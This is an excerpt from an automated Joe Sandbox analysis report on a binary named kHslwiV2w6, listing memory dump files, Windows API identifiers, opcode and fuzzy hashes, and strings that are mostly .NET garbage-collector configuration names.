• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
                                                                                                                                                                                                                                                                                  • Instruction ID: 26008570e563b15070e7ba2495a20548ce6f31c3edced9e117aa1bd68b46d52a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b6e7524cfd3a7049b78d530cb028a5667da698e63c4b036217a325343ed2f5
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B417E61B0868642FB14AF26AD402B5A3A0EF18BF8FD40335D97D47BD9DE28E441CB64

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
                                                                                                                                                                                                                                                                                  • Instruction ID: 7d63a2d10c53c9de89b1e5e453e38a16920df9a8445e5d50776a935d080259c1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54d16fb7520780bd85eec3c4bf88bb714ed96ad8374a8c3859c77b8b9086a31d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B131B332B05B9281EA14EB16D9001AAA3A4FF49FD0F848535DF4C17B99EF38E5628750
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
                                                                                                                                                                                                                                                                                  • Instruction ID: 313baa07f518afc0024f7ea7e33ebc96aa15c0824a82e5c912442990176942e9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bbfaa70841822840f390fb10a6491ea87be68f299496f59d245e6c0d776f768
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26015E25F0CAD241F660BB16EC843F9E790EF647A0FD91035D95D42AA9CE3CE585CB60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                                                                  • Opcode ID: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
                                                                                                                                                                                                                                                                                  • Instruction ID: 148b3a860c7d791264c69a59a8ab2b6b5ca5699919a6ef83982c11d86ca08bf9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88E0C234F1658197EB18AB13EC426A46252FF4EB00FC48038C80D47354DE2EA11A8F60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF72F6427CF,?,?,00000030), ref: 00007FF72F6428E2
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2131581837-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Event
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 4201588131-0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b2df50b22f88e90d383fbc999c0b4c68a7662b2a9291df2bb10142457fbc865c
                                                                                                                                                                                                                                                                                  • Instruction ID: 5cd62c0b599c2009f9497cdccc4662bf34227656843548da76648e80872ad7e6
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2df50b22f88e90d383fbc999c0b4c68a7662b2a9291df2bb10142457fbc865c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D61DF21F092828AFB14FB66AC412F9A36AFF54784F944035DE0D5BB96DE3CE5528B10
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF72F60AC51,?,?,?,?,00007FF72F5AFCD1,?,?,?,00007FF72F5B0254,00000000,00000020,?), ref: 00007FF72F60B62A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                  • Opcode ID: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
                                                                                                                                                                                                                                                                                  • Instruction ID: 0b7ec15fbcb5621f8076487a0d0e78183bed82fee291fffa99b9142b0e3970b7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8f8c83a7ed87ce2d3b6738c234a410da243a5fab35cdf610d6bdacd798f5f2b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 72E0EC00F2918701F95932A15C661F4814AFF55770EBC9B38E97E853C3FD1CA8565D30
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                  • Opcode ID: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
                                                                                                                                                                                                                                                                                  • Instruction ID: af164b4601adce9cef70bccbc1d092fafd66a7aac49e1022e494f086de350c2b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4DB01200F16481C2E3043723BC82308011ABB06B02FC04024DA08F1250CD1D81A50F10
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                                                                                                                                                                                                                                                  • API String ID: 0-799405152
                                                                                                                                                                                                                                                                                  • Opcode ID: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
                                                                                                                                                                                                                                                                                  • Instruction ID: 1741177ce2a31e2ac9b9003e38ce340ac3dde06d6df772ccec2b45d3ddf195df
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7423B69B08AD642FB20AB55FC50AE9A3A5FF59BC8FC15136D98C07B24DF7CD2018B14
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                   • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: strcmp
                                                                                                                                                                                                                                                                                  • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                                                                                                                                                                                                                                                  • API String ID: 1004003707-1294421646
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                                                                                                                                                                                                                                                  • String ID: SeLockMemoryPrivilege
                                                                                                                                                                                                                                                                                  • API String ID: 1752251271-475654710
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread$BreakCounterDebugPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT$Concurrent GC: Restarting EE
                                                                                                                                                                                                                                                                                  • API String ID: 30421299-2108734148
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: SwitchThread$BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 223621376-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug$CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3888577265-0
                                                                                                                                                                                                                                                                                  • Opcode ID: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
                                                                                                                                                                                                                                                                                  • Instruction ID: 21dabfa785af314382f27e73d9c10530382b563e7b59ac107c1e88527598aa82
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
